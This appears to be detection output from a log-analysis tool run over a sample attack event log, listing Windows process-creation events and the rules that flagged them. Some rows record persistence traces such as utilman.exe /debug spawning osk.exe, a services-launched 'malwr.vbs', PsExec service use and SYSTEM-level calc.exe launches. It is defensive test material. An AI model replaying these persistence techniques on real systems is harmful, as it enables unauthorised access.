winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:22:24.901 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:22:40.373 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:26:03.585 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: 
C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:26:05.628 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:31:03.687 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:36:03.788 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:03.890 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:08.777 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:08.967 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:08.977 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:09.828 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:42:05.859 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe C:\Windows\system32\CompatTelRunner.exe : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.238 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
\SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.458 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.699 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.719 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.759 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 
ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.919 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe : Path: C:\Windows\System32\lsm.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.929 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:12.931 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch : Path: 
C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:13.151 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\VBoxService.exe : Path: C:\Windows\System32\VBoxService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:13.181 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:13.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.232 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe : Path: 
C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.094 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup : Path: C:\Windows\System32\gpscript.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" : Path: C:\Program Files\freeSSHd\FreeSSHDService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.865 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process 
Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.065 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.436 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:17.026 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe : Path: C:\Windows\System32\UI0Detect.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:22.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.148 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe"" : Path: C:\Windows\System32\taskhost.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.329 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.419 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe"" : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:37.392 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k 
GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:37.432 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:37.602 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:38.654 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:38.704 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe"" : Path: C:\Windows\PSEXESVC.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:38.774 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg * ""hello from run key"" : Path: C:\Windows\System32\msg.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run 
key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:43:24.560 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" : Path: C:\Program Files\Windows Media Player\wmpnetwk.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:46:04.916 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: 